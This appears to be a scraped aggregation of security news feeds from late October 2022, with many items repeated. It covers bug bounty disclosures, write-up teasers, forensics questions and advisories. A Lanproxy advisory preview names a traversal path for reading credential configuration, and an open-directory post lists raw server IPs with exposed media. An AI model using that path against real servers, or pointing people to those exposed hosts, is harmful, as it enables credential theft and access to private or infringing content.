    Looking for something that finds matches for vulnerable code. EDIT: Looking for webapp bugs mainly. So Javascript would be one language that I'll be looking at. submitted by /u/Independent-Onion875 [link] [comments]
  • Open

    Movies, series, software, games, audiobooks, and more
    http://79.137.34.186/ => Learning medias (sales, enterprises etc) http://91.134.114.137/ => Spanish racing content (videos, software) http://51.178.9.98/ => Anime, movies http://91.121.80.14:8080/ => mostly movies http://91.121.165.34/ => Games, software http://94.23.6.14:8080/ => Movies, series https://5.196.65.67/ => Spanish audiobooks https://37.187.125.63/downloads/ => French audiobooks, software, movies https://37.187.117.176:38946/ => Movies, audiobooks http://87.98.153.143:10080/ => Series, movies http://91.121.0.62:580/ => Chinese movies, series http://54.37.246.61/ => Photoshoot pictures (in /Deb) http://51.255.206.132:7081/ => Lots of movies and series (mostly french, there's multi) http://5.39.88.99:18080/ => Movies, series, courses (mostly french) http://5.135.153.41:9000/ => Courses, how-to guides, series (french and english) http://5.135.155.61/ => Raw anime video/audio/misc files http://5.135.155.232/ => Spanish radio rips ​ Not making NSFW because they all seem clean, but I haven't been through it all. submitted by /u/MasterIO02 [link] [comments]
    public notices, newsletters and meeting minutes for Rochester, NY.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Authentication bypass for leads to take over any users account.
    Krisp disclosed a bug submitted by n0_m3rcy: https://hackerone.com/reports/1608151 - Bounty: $5000
    XSS in SocialIcon Link
    Linktree disclosed a bug submitted by sudi: https://hackerone.com/reports/1698652 - Bounty: $600
  • Open

    RedEye — Open Source Analytical tool
    RedEye is an analytical tool developed by CISA and DOE’s Pacific Northwest National Laboratory to assist Red Teams with visualizing and… Continue reading on Medium »
  • Open

    How To Simplify Fuzz Testing For C++
    Today I want to show you a way to simplify fuzz testing for your C++ applications. Continue reading on Medium »
    A $250 Entirely Automated Bug Bounty
    TL;DR- In my experience, the easiest bounties are fuzzing/leaked file ones, and all it takes is a few clicks of an automated tool to make… Continue reading on The Gray Area »
  • Open

    How To Simplify Fuzz Testing For C++
    Today I want to show you a way to simplify fuzz testing for your C++ applications. Continue reading on Medium »
    A $250 Entirely Automated Bug Bounty
    TL;DR- In my experience, the easiest bounties are fuzzing/leaked file ones, and all it takes is a few clicks of an automated tool to make… Continue reading on The Gray Area »
  • Open

    Tales from the Kernel Parameter Side
    submitted by /u/MiguelHzBz [link] [comments]
    Need help finding specs needed for basic investigation programs
    Hi everyone! I am a lawyer at a criminal court and my place of work is willing to invest in a machine that would allow us to analyze and investigate forensic data. Sadly, we lack a person with the proper training to guide us in this acquisition, so it's all fallen down to... My basic little-above-average knowledge of computers. I am looking into the minimum spec requirements needed to run Cellebrite Reader, FTK imager, X-Ways, maybe at some point Nuix, and I can't seem to find that information anywhere. Can you please help me? Additionally, but more as a bonus, do you people have any ressources a layperson could use in order to get up to some kind of speed in this field? Thank you so much from a very lost lawyer who really appreciates your input. submitted by /u/Mana0307 [link] [comments]
  • Open

    SecWiki News 2022-10-31 Review
    RAID 2022 论文录用列表 by ourren 低成本自制短信转发器(Air780E+ESP32C3) by 路人甲 SecWiki周刊(第452期) by ourren APT28 样本分析报告 by ourren BREAK业务风险枚举与规避知识框架v0.1.0 by ourren 从科学家到企业家要迈过多少道坎? by ourren 全球高级持续性威胁(APT)2022年中报告 by ourren 一篇了解Java反射 by SecIN社区 写在博士生涯的最后 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-31 Review
    RAID 2022 论文录用列表 by ourren 低成本自制短信转发器(Air780E+ESP32C3) by 路人甲 SecWiki周刊(第452期) by ourren APT28 样本分析报告 by ourren BREAK业务风险枚举与规避知识框架v0.1.0 by ourren 从科学家到企业家要迈过多少道坎? by ourren 全球高级持续性威胁(APT)2022年中报告 by ourren 一篇了解Java反射 by SecIN社区 写在博士生涯的最后 by ourren 更多最新文章,请访问SecWiki
  • Open

    Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure
    Learning about the variety of techniques used by banking Trojans can help us detect other activities of financially motivated threat groups. The post Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure appeared first on Unit 42.
  • Open

    Scripts to detect Canary Tokens
    submitted by /u/DigiTroy [link] [comments]
  • Open

    Write-up: Forced OAuth profile linking @ PortSwigger Academy
    No content preview
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 3) — StackZero
    No content preview
    Android Pentesting 101 — Part 3
    No content preview
    Phoenix Challenges — Stack Two
    No content preview
  • Open

    Write-up: Forced OAuth profile linking @ PortSwigger Academy
    No content preview
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 3) — StackZero
    No content preview
    Android Pentesting 101 — Part 3
    No content preview
    Phoenix Challenges — Stack Two
    No content preview
  • Open

    Write-up: Forced OAuth profile linking @ PortSwigger Academy
    No content preview
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 3) — StackZero
    No content preview
    Android Pentesting 101 — Part 3
    No content preview
    Phoenix Challenges — Stack Two
    No content preview
  • Open

    FreeBuf早报 | 台湾省全岛个人信息被放在网上兜售;Win10 系统将永久禁用 IE11
    初步调查确认目前释出的20万笔集中在台湾宜兰地区,且资料都吻合。
    新形势下的数据安全思考 | CIS 2022网络安全创新大会议题前瞻
    区块链、大数据、云计算等新兴技术迅速成熟,为各行业数字化转型提供了坚实技术支撑。
    一款新的开源工具正在大肆扫描公共AWS的“秘密”
    为了帮助及时发现公共S3桶上暴露的秘密,Harel创建了一个名为 S3crets Scanner 的Python工具。
    CISA 公布关键基础设施部门的网络安全KPI
    该报告文件是美国总统拜登于2022年7月签署的安全备忘录的实施结果,并计划每隔6到12个月更新一次。
    因涉嫌经营 DiDW 暗网市场,一名学生遭德国警方逮捕
    该嫌疑人面临经营非法交易平台的刑事指控,最高可能被判十年监禁。
    外媒称英国前首相特拉斯的手机被俄罗斯间谍入侵
    据《每日邮报》10月30日报道,英国前首相利兹·特拉斯(Liz Truss)的私人手机在夏季竞选时被俄罗斯间谍入侵。
    16岁成为勒索组织扛把子,黑客未成年化趋势明显?
    最近以LAPSUS$年仅16岁头目为代表的少年黑客们搅动了整个世界,但背后的问题:他们为何走上网络犯罪更值得思考。
  • Open

    RomCom 黑客瞄准乌克兰军事机构
    作者:黑莓研究和情报团队 译者:知道创宇404实验室翻译组 原文链接:https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries 总结 曾经不为人知的RomCom RAT黑客现在瞄准乌克兰军事机构。已知...
    CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF 漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/VaHYzhkn2gZhHcCPTdO-Tg 漏洞描述 6月29日,Atlassian官方发布安全公告,在Atlassian Jira 多款产品中存在服务端请求伪造漏洞(SSRF),经过身份验证的远程攻击者可通过向Jira Core REST API发送特制请求,从而伪造服务端发起请...
  • Open

    RomCom 黑客瞄准乌克兰军事机构
    作者:黑莓研究和情报团队 译者:知道创宇404实验室翻译组 原文链接:https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries 总结 曾经不为人知的RomCom RAT黑客现在瞄准乌克兰军事机构。已知...
    CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF 漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/VaHYzhkn2gZhHcCPTdO-Tg 漏洞描述 6月29日,Atlassian官方发布安全公告,在Atlassian Jira 多款产品中存在服务端请求伪造漏洞(SSRF),经过身份验证的远程攻击者可通过向Jira Core REST API发送特制请求,从而伪造服务端发起请...

  • Open

    Phoenix Challenges -- Stack Two
    My latest writeup for the Exploit.Education Phoenix exploitation challenge is now live on my Medium blog. More are planned to be coming soon. Any feedback would be most welcome! ​ https://secnate.medium.com/phoenix-challenges-stack-two-da59b290dfa submitted by /u/ProgrammingBro123 [link] [comments]
  • Open

    Cross-Site Request Forgery (CSRF) to xss
    MTN Group disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1183241
    Cross-site Scripting (XSS) - Reflected
    MTN Group disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1183336
  • Open

    What InfoSec Professionals Can Gain From TraceLabs CTF
    Trace Labs is designed to be a catalyst for improving the state of missing persons location and family reunification. Continue reading on The Sleuth Sheet »
    Challenge Ondes de choc
    Correction du challenge proposé sur twitter le 27 octobre 2022. Continue reading on Medium »
    SPY NEWS: 2022 — Week 43
    Summary of the espionage-related news stories for the Week 43 (October 23–29) of 2022. Continue reading on Medium »
  • Open

    Crack WiFi WPA2 PSK Encryption
    In today Topic We Talk about how we can easily crack wifi WPA2 PSk encryption by using wordlist Attack. Continue reading on Medium »
  • Open

    Paytm vendors Transaction count disclosure
    Paytm released QR scan code boxes to vendors to simplify there transactions! Continue reading on Medium »
    How Uber social engineering hack compromised Uber’s Hackerone bug bounty reports
    Uber faced another security breach in its network on the 15th of September. Just hours later Uber confirmed this by posting a tweet that… Continue reading on Medium »
    Android Pentesting 101 — Part 3
    Welcome to Part 3 of Android Pentesting. This series is about how you can hack into Android and find vulnerabilities in it using various… Continue reading on InfoSec Write-ups »
    Registrations Open for IWCON2022 Version 2.0 — the Online International Cybersecurity Conference
    Book your seats today! Continue reading on InfoSec Write-ups »
    Old RCE worth $3362.
    Have you ever read the article “RCE via Symfony Secret Fragments” ? If you haven’t read it, there are so many articles on Medium. Shodan… Continue reading on DevOps.dev »
    Palo Alto and Panorama — Hardening the Configuration
    As per Hardening Network Devices National Security Agency Cybersecurity Information, below points are covers in this Course. Continue reading on Medium »
  • Open

    SecWiki News 2022-10-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    cant find the signature column in encase v7 (20.3.0.214)
    submitted by /u/shalnark90 [link] [comments]
    How will the transition from physical SIM cards to e-SIM affect mobile device examinations?
    Apple made the transition to e-SIM in their iPhone 14 lineup. As more and more mobile device manufacturers continue to transition to that standard, how are investigations going to be affected, and the forensics profession as a whole? submitted by /u/Labios_Rotos77 [link] [comments]
    NAND memory chip
    Hey guys i have this question if you can help me : What happens to data storage inside a NAND memory chip if it is broken or cracked? (I'm talking about the NAND memory chip which is inside the micro sd) submitted by /u/Interesting_Let_1338 [link] [comments]
  • Open

    Log4j2 远程代码执行漏洞(CVE-2021-44228)思考
    漏洞介绍Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下
    FreeBuf早报 | 中国视频物联安全规模达2.832亿美元;澳洲物业公司 SSKB 遭网络攻击
    到国家政策标准、热点事件的强力驱动,中国视频物联安全的市场规模为 2.832 亿美元。
  • Open

    Part 3 of Lord Of The Ring0 - Sailing to the land of the user (and debugging the ship)
    submitted by /u/Idov31 [link] [comments]
    The Automated Penetration Testing Reporting System (APTRS). Pentester can easily maintain projects, customers, and vulnerabilities, and create PDF reports without needing to use traditional DOC files. The tool allows you to maintain a vulnerability database, so you won't need to repeat yourself.
    submitted by /u/Ano_F [link] [comments]
  • Open

    Registrations Open for IWCON2022 Version 2.0 — the Online International Cybersecurity Conference
    No content preview
  • Open

    Registrations Open for IWCON2022 Version 2.0 — the Online International Cybersecurity Conference
    No content preview
  • Open

    Registrations Open for IWCON2022 Version 2.0 — the Online International Cybersecurity Conference
    No content preview
  • Open

    can non/wireless peripherals connected to phones/computers send data?
    a mouse, bluetooth earbuds for phone, wired/wireless keyboards? most of them come from china. im curious if there are chips in them that then use the host computer to take any data and leak that out? just curious. submitted by /u/5553330 [link] [comments]
  • Open

    [译] Cilium:基于 BPF+EDT+FQ+BBR 更好地带宽网络管理(KubeCon+CloudNativeCon, 2022)
    译者序 本文翻译自 KubeCon+CloudNativeCon Europe 2022 的一篇分享: Better Bandwidth Management with eBPF。 作者 Daniel Borkmann, Christopher, Nikolay 都来自 Isovalent(Cilium 母公司)。 翻译时补充了一些背景知识、代码片段和链接,以方便理解。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 问题描述 1.1 容器部署密度与(CPU、内存)资源管理 1.2 网络资源管理:带宽控制模型 1.3 K8s 中的 pod 带宽管理 1.3.1 Bandwidth meta plugin 1.3.2 入向(ingress)限速存在的问题 1.3.3 出向(egress)限速存在的问题 1.3.4 Bandwidth meta plugin 问题总结 2 解决思路 2.1 回归源头:TCP “尽可能快”发送模型存在的缺陷 2.2 思路转变:不再基于排队(queue),而是基于时间戳(EDT) 2.3 3 EDT/timing-wheel 应用到 K8s 3 Cilium 原生 pod 限速方案 3.1 整体设计:基于 BPF+EDT 实现容器限速 3.2 工作流程 3.3 数据包处理过程 3.4 性能对比:Cilium vs. Bandwidth meta plugin 3.4 小结 4 公网传输:Cilium 基于 BBR 的带宽管理 4.1 BBR 基础 4.1.1 设计初衷 4.1.2 性能对比:bbr vs. cubic 4.2 BBR + K8s/Cilium 4.2.1 存在的问题:跨 netns 时,skb->tstam…

  • Open

    Music in wma format.
    submitted by /u/International_Milk_1 [link] [comments]
    Index of bunglefever/ftp/pub (see comment)
    submitted by /u/International_Milk_1 [link] [comments]
    Index of /27/items/tntvillage_460222/Deep Purple Bootlegs/
    submitted by /u/International_Milk_1 [link] [comments]
    A lot of albums (see comment)
    submitted by /u/International_Milk_1 [link] [comments]
    Some full albums.
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    Urgent: Patch OpenSSL on November 1 to avoid “Critical” Security Vulnerability - GlobalSign
    submitted by /u/c0r0n3r [link] [comments]
    GitHub - Legit-Labs/legitify: Detect and remediate misconfigurations and security risks across all your GitHub assets
    submitted by /u/roy_6472 [link] [comments]
    mitmproxy 9: WireGuard Mode and Raw UDP Support
    submitted by /u/mhils [link] [comments]
  • Open

    Using stickers to fool facial recognition
    submitted by /u/verfahrensweise [link] [comments]
  • Open

    Ask HN: Is your organisation patching the critical OpenSSL vulnerability?
    I'm wondering how many organisations aren't really aware yet of how serious this is. "OpenSSL warns of critical security vulnerability with upcoming patch We don't have the details yet, but we can safely say that come Nov. 1, everyone -- and I mean everyone -- will need to patch OpenSSL 3.x. " https://www.zdnet.com/article/openssl-warns-of-critical-security-vulnerability-with-upcoming-patch/ Comments URL: https://news.ycombinator.com/item?id=33388142 Points: 11 # Comments: 10
    Yellow security vulnerability repository is being removed – GitHub Changelog
    Article URL: https://github.blog/changelog/2022-10-28-yellow-security-vulnerability-repository-banner-is-being-removed/ Comments URL: https://news.ycombinator.com/item?id=33383440 Points: 1 # Comments: 0
    Patch OpenSSL on November 1 to avoid “critical” security vulnerability
    Article URL: https://www.globalsign.com/en/blog/urgent-patch-openssl-november-1-avoid-critical-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=33380500 Points: 191 # Comments: 192
    Vulnerability: Infiltrating a network via Powerline (HomePlugAV) adapters (2014)
    Article URL: https://www.bentasker.co.uk/posts/documentation/security/282-infiltrating-a-network-via-powerline-homeplugav-adapters.html Comments URL: https://news.ycombinator.com/item?id=33379901 Points: 2 # Comments: 1
  • Open

    HTTP question
    Hi All, Stupid question but while searching for firewood I looked up the name of my usual supplier - exeterlogs.co.uk - put it in the chrome address bar and hit enter, then ignored the warnings and continued to the http site. It was for a local electrician. www.exeterlogs.co.uk sent me to the correct site. ​ How in this day and age can 2 websites have the same address? Is this a security failure of my computer? Many thanks for any replies submitted by /u/ColdStatistician8872 [link] [comments]
    "Market share" of information security jobs?
    Hey, For a while now I keep thinking and changing my mind on what branch of the security field I should focus on. I know some programming, I know some DevOps, I know some systems engineering and I also have the OSCP and I am currently doing a GCP Security Engineer course for the cert. However, I cannot make my mind, all of these paths are very interesting and I would love to pursue them all (application security also sounds great), but of course there is no time and I want to make the most out of mine. Thus, I am trying to look for objective reasons of choosing one of them, and then compare with my subjective reasons. Soo, the actual question: - Is there a statistic on the number of jobs openings/salary expectations/salary capping for these kind of roles? ​ I appreciate any feedback on the matter and your take on this, how did you choose your career, would you change it, what is it, why would you change it and to what? ​ Thanks, and let me know if the flair is not the right one. submitted by /u/GeologistLegitimate6 [link] [comments]
    Internal Pentest additional testing.
    Lets say i'm testing a lab, fairly well locked down that said I want to make sure that the lab has been properly tested. I have a limited scope, as well as rules so I can't just go buckwild. Only one credential was found during breach research which doesn't appear to be valid (lockout policy is tight so spraying/stuffing seems unwise at a mass scale). Performed network scanning and vulnerability scanning. Network has a mix of OS' nothing too out of date. All web servers seen appear to require credentials and are reasonably up to date, no obvious exploitable vulnerabilities. Responder has not captured any LLMNR/NBNS hashes. HSRP traffic was seen, but unable to exploit as of now. Can't use mitm6 or impacket for other reasons. No weak SNMP creds, no IPMI or the like. Researched OS versions in use, tried default credentials on the web services, tried interrogating SMB and other protocols to get credentials. SE is out of scope. What would you be doing in this situation? I should note that exploitation is not expected in this lab, like I said the main goal is to make sure everything has been tested properly and then work done documented. submitted by /u/realKevinNash [link] [comments]
    should all logs be saved in GMT+0 format and then it is up to the security analyst's client machine to automatically change the time based on his location?
    We have a SIEM and upon checking the web interface of a software we use, I can see that the local logs are being saved in GMT+0 date and time. The logs are sent to our SIEM and then when I query the SIEM the _time shows the correct time because I set the time zone in SIEM manually to the correct GMT. Is it correct to assume that if you are in a global company that works in different timezones; it is best practice to save all generated logs locally in GMT+0? submitted by /u/Ecstatic_Constant_63 [link] [comments]
  • Open

    Concurso de Auditoría Hats V2. Hasta $40K en premios
    Nuevo desafío a Hats Finance, esta vez con nuestra propia plataforma de bug bounty. Continue reading on Medium »
    Simple DOM based XSS Trick
    Hello hackers, c0ff33b34n here to teach you an easy DOM based XSS trick. Continue reading on Medium »
    Walkthrough of Exploiting CVE-2022–42889 (Text4Shell/ACT4Shell)
    Summary Continue reading on System Weakness »
    5 Brain Hacks That Made me one among the Top 15 Security Researchers!
    Continue reading on ILLUMINATION »
    Some of the Best Search Engines used by Hackers/Security Researchers/Bug Bounty Hunters in 2022
    The most exciting part about being a security researcher is when you’ve got a hunch and you have that moment when you feel like you have… Continue reading on Medium »
    Finding live website using knockpy
    Hi, here i am going to show how to find live subdomains using knockpy. Continue reading on Medium »
    How I Fetched Millions of Confidential Files From the Server without the Permission of Concerned…
    NOTE : Continue reading on Medium »
  • Open

    2 Ways to Dump Lsass Without Mimikatz
    Local Security Authority Subsystem Service, or better known as LSASS, is one of the core software of a Windows server. It is responsible… Continue reading on Medium »
  • Open

    SecWiki News 2022-10-29 Review
    美国网络安全国策之EDR「端点检测和响应」 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-29 Review
    美国网络安全国策之EDR「端点检测和响应」 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    The Ultimate Guide of Deep and Dark Web Research — Part II
    The Seven Strategies for Researching the Deep and Dark Web Continue reading on Medium »
    The Ultimate Guide of Deep and Dark Web Research — Part I
    How to Boost Your Cybersecurity by Uncovering Relevant, Timely, and Actionable Insights Continue reading on Medium »
    Challenge Ondes de choc
    Trouvez une photo publiée sur la page https://www.facebook[.]com/pejykristianina le 30 septembre 2022. Continue reading on Medium »
  • Open

    How long do deleted text messages stay in mmssms.db?
    If I deleted some text message today, how long will it stay in the database? Thanks. submitted by /u/prois99 [link] [comments]
  • Open

    Accessing/Editing Folders of Other Users in the Orginisation.
    Lark Technologies disclosed a bug submitted by snapsec: https://hackerone.com/reports/1025881 - Bounty: $1000

  • Open

    Privilege Escalation to All-staff group
    Lark Technologies disclosed a bug submitted by snapsec: https://hackerone.com/reports/1021460 - Bounty: $500
    HTML INJECTION FOUND ON https://adobedocs.github.io/analytics-1.4-apis/swagger-docs.html DUE TO OUTDATED SWAGGER UI
    Adobe disclosed a bug submitted by dreamer_eh: https://hackerone.com/reports/1736466
  • Open

    Exposed Mongo Express Without Authentication
    There is a specific keyword ,which we can use to get open Mongo Express interfaces in censys.The interface is as follows- Continue reading on Medium »
    How i was able to get free money via sending negative tokens
    How i was able to get free money via sending negative tokens Continue reading on Medium »
    Practical Dynamic Analysis Of Mobile Applications
    Hands-on Practical Dynamic Analysis Of Mobile Applications Continue reading on Medium »
    Bug Bounty Reports
    Summary of almost all paid bounty reports on H1 Continue reading on Medium »
    My Methodology for Making a Book library with Notion for Bug Bounty and Pentesting
    How to Use Notion 100% in Your Bug Bounyt and Pentesting Self-Study. Continue reading on Medium »
    Bug Zero at a Glance [Week 22–28 October]
    What happened with Bug Zero? Continue reading on Bug Zero »
    The Top 6 Bug Bounty Hunters
    TL;DR- There are only a handful of hunters who have passed $1,000,000 in total bounty payouts, the first of them barely out of high school… Continue reading on The Gray Area »
    RCE docker api, but …
    This is a short write up and to be honest “lazy” to write this. Continue reading on Medium »
    Blind SSRF in Skype (Microsoft)
    Server Side Request Forgery is a vulnerability that allows attacker to make server request to attacker controlled network location/path. Continue reading on InfoSec Write-ups »
  • Open

    Extract RAM Data from process using Volatility
    Hi, ​ I need to extract all data from this .exe file from a RAM dump (Windows) found using psscan. When I run windows.dumpfiles with this process ID I cannot get any information. Am I at a dead end or is there some other command that I can use to get RAM memory from this file? I would ideally like strings of all computations etc PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output 19176 6884 CryptoProgA.ex 0x808a00e130c0 1 - 1 True 2022-10-28 21:45:42.000000 N/A Disabled submitted by /u/Forensics808 [link] [comments]
    Whatsapp and Wechats
    Anyone have any success collecting chats from Whatsapp and Wechat on an IOS device using the Cellebrite? Any recommendations for a successful collection? submitted by /u/hw60068n [link] [comments]
    MMKV Visualizer - simple visualizer for mobile forensicators
    A simple visualizer utilizing Pyodide & Svelte to parse MMKV databases, a framework by Tencent/WeChat -- https://www.mmkv-visualizer.com/ submitted by /u/pakmanzzz [link] [comments]
  • Open

    RC4 Is Still Considered Harmful
    submitted by /u/sanitybit [link] [comments]
    Passkeys as a tool for user retention
    submitted by /u/Khryse [link] [comments]
    Dastardly - a free, lightweight web application security scanner for your CI/CD pipeline
    submitted by /u/Khryse [link] [comments]
    CVE-2022-22241: Juniper SSLVPN / JunOS RCE and Multiple Vulnerabilities – Blog
    submitted by /u/spacedust65 [link] [comments]
    Spartacus DLL Hijacking Discovery Tool - "all in one"
    submitted by /u/h0wlett [link] [comments]
    TCP/IP Vulnerability CVE-2022–34718 PoC Restoration and Analysis
    submitted by /u/sanitybit [link] [comments]
    Hardware Trojans Under a Microscope
    submitted by /u/Ryancor [link] [comments]
  • Open

    Multi-user password manager
    I'm looking for some recommendations concerning a password manager that would: be multi-user have different user roles and levels have audit logging be on-prem, offline, self hosted possibly be open-source or reasonably priced If you happen to have experience with a pm like this, I'd appreciate a recommendation, thanks! submitted by /u/FreakySeahorse [link] [comments]
    How to forward syslog event related to CMDs done by none root user
    Hi, Although i have setup my /etc/rsyslog.d/50-default.conf to forward all event logs ```*.*```, but i only see commands done by the root user, is there something i missed ? ``` (base) ibrasec@ibrasec-HP-ProBook-640-G5:/etc/rsyslog.d$ cat 50-default.conf # Default rules for rsyslog. # # For more information see rsyslog.conf(5) and /etc/rsyslog.conf # # First some standard log files. Log by facility. # *.* u/192.168.106.214 auth,authpriv.* u/192.168.106.214 /var/log/auth.log *.*;auth,authpriv.none u/192.168.106.214 -/var/log/syslog #cron.* /var/log/cron.log #daemon.* -/var/log/daemon.log kern.* u/192.168.106.214 -/var/log/kern.log #lpr.* -/var/log/lpr.log mail.* u/192.168.106.214 -/var/log/mail.log user.* u/192.168.106.214 -/var/log/user.log # # Logging for the mail system. Split it up so that # it is easy to write scripts to parse these files. # #mail.info -/var/log/mail.info #mail.warn -/var/log/mail.warn mail.err /var/log/mail.err # # Some "catch-all" log files. # #*.=debug;\ # auth,authpriv.none;\ # news.none;mail.none -/var/log/debug #*.=info;*.=notice;*.=warn;\ # auth,authpriv.none;\ # cron,daemon.none;\ # mail,news.none -/var/log/messages # # Emergencies are sent to everybody logged in. # *.emerg :omusrmsg:* # # I like to have messages displayed on the console, but only on a virtual # console I usually leave idle. # #daemon,mail.*;\ # news.=crit;news.=err;news.=notice;\ # *.=debug;*.=info;\ # *.=notice;*.=warn /dev/tty8 ``` submitted by /u/AlarmRevolutionary52 [link] [comments]
    Stix files
    Is anyone familiar with the stix file format and how to visualize them on a Windows 10 box? submitted by /u/MrRaspman [link] [comments]
    Starting an InfoSec career
    I’m currently 18 and in the running to start a degree in Compsci. My main areas of interest are pentesting, ethical hacking and cyber security analyst roles/ red teaming. Here are my questions: What job positions are best to start with? What skills should I start working on right now? Apart from a degree, what certifications are best? If anyone has experience in ethical hacking, pentesting or cyber security in general I’d appreciate a PM as I’m trying to start networking. submitted by /u/wholesnacc15 [link] [comments]
  • Open

    Audio, but I do not know the language
    submitted by /u/Bratensauce75 [link] [comments]
    Retro heaven - lots of program files spanning back to 1995 (might use google translate from Polish though)
    submitted by /u/smsaczek [link] [comments]
    shower pics
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    movies, tv, music and Japanese cartoons
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of motor oil
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    SecWiki News 2022-10-28 Review
    DeFi Hacks Analysis - Root Cause by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-28 Review
    DeFi Hacks Analysis - Root Cause by ourren 更多最新文章,请访问SecWiki
  • Open

    OSINT Nedir? OSINT İle Neler yapılabilir?
    Açık Kaynak İstihbaratı olarak Türkçeye çevrilen OSINT (Open Source Intelligence) pasif bilgi toplama aracıdır. Pasif bilgi toplama… Continue reading on Medium »
    【滲透測試LAB】如何使用OSINT - SpiderFoot 執行情蒐
    資訊科技蓬勃發展下,創造出大量公開形式的數據分散於網路世界中,當這些數據被有效化的梳理,可說是Open-Source Intelligence(OSINT)。 Continue reading on Medium »
  • Open

    Defeating Guloader Anti-Analysis Technique
    Unit 42 is providing a script to deobfuscate a recently discovered Guloader variant that uses anti-analysis techniques, and other samples like it. The post Defeating Guloader Anti-Analysis Technique appeared first on Unit 42.
  • Open

    ATT&CK红队评估(红日靶场一)
    ATT&amp;CK红队评估(红日靶场一)学习笔记
    2023年1月1日施行!《网络产品安全漏洞收集平台备案管理办法》发布
    《管理办法》共计十条,对网络和拟网络安全漏洞收集平台的注册、备案、信息变更、注销等程序提出了系统要求。
    国务院办公厅印发全国《全国一体化政务大数据体系建设指南》
    《指南》明确了全国一体化政务大数据体系的分阶段建设目标,有利于在全国构建标准统一、布局合理、管理协同、安全可靠的政务大数据体系。
    汤森路透3个数据库处于公开访问状态,至少包含3TB敏感数据
    据Cybernews 10月27日报道,跨国传媒集团汤森路透公司至少有三个数据库处于开放状态,访客无需验证即可访问。
    CISCO设备信息泄漏漏洞案例2
    上一篇文章介绍了cisco路由器设备的2个漏洞案例,这次补充cisco ip电话设备和安全设备的漏洞案例。
    澳大利亚保险巨头遭拖库,390万用户信息全部泄露
    澳大利亚医疗保险公司Medibank周三披露,在最近一次勒索软件攻击之后,其所有客户的个人信息都遭泄露。
    FreeBuf周报 | 二十大之网络安全听听代表怎么说;超市巨头麦德龙遭网络攻击
    总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    未知攻击者部署 RomCom RAT, 攻击乌克兰军方
    远程访问特洛伊木马Romcom Rate背后的网络攻击者被发现以乌克兰军事机构为目标。
    发现新APT组织!"南亚之蟒"针对印度国防部进行间谍活动
    猎影实验室发现新的APT组织!该组织针对印度国防部投递新型Python窃密软件,开展持久间谍活动。我们以内部追踪代号“APT-LY-1004”进行跟踪。
    希壤元宇宙安全实践之路| CIS 2022网络安全创新大会议题前瞻
    他将从元宇宙的产业生态、安全环境的变迁角度,分享希壤采取的内容风控、反作弊和系统级防御方案。
    苹果曝严重漏洞,可窃听用户与Siri对话
    苹果近期披露了名为SiriSpy的iOS和macOS系统漏洞,使具有蓝牙访问权限的应用程序能够窃听用户与 Siri 的对话。
    FreeBuf早报 | 路透社泄露3TB客户数据;苹果确认将在欧盟国家使用USB-C接口
    跨国媒体集团汤姆森路透(Thomson Reuters)留下了一个3TB的开放数据库,其中包含敏感的客户和企业数据,包括明文格式的第三方服务器密码。
  • Open

    Blind SSRF in Skype (Microsoft)
    No content preview
  • Open

    Blind SSRF in Skype (Microsoft)
    No content preview
  • Open

    Blind SSRF in Skype (Microsoft)
    No content preview
  • Open

    CVE-2021-3019 Lanproxy 目录遍历漏洞
    作者:李安@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/XBsBNAzyciWwCRP3bMZnOw 漏洞描述 Lanproxy 0.1 存在路径遍历漏洞,该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。 Lanproxy lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具...
  • Open

    CVE-2021-3019 Lanproxy 目录遍历漏洞
    作者:李安@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/XBsBNAzyciWwCRP3bMZnOw 漏洞描述 Lanproxy 0.1 存在路径遍历漏洞,该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。 Lanproxy lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具...
  • Open

    Critical OpenSSL vulnerability and fix to be released Nov first
    Article URL: https://www.docker.com/blog/security-advisory-critical-openssl-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33366483 Points: 2 # Comments: 0

  • Open

    How to block all but a single IP from accessing a port?
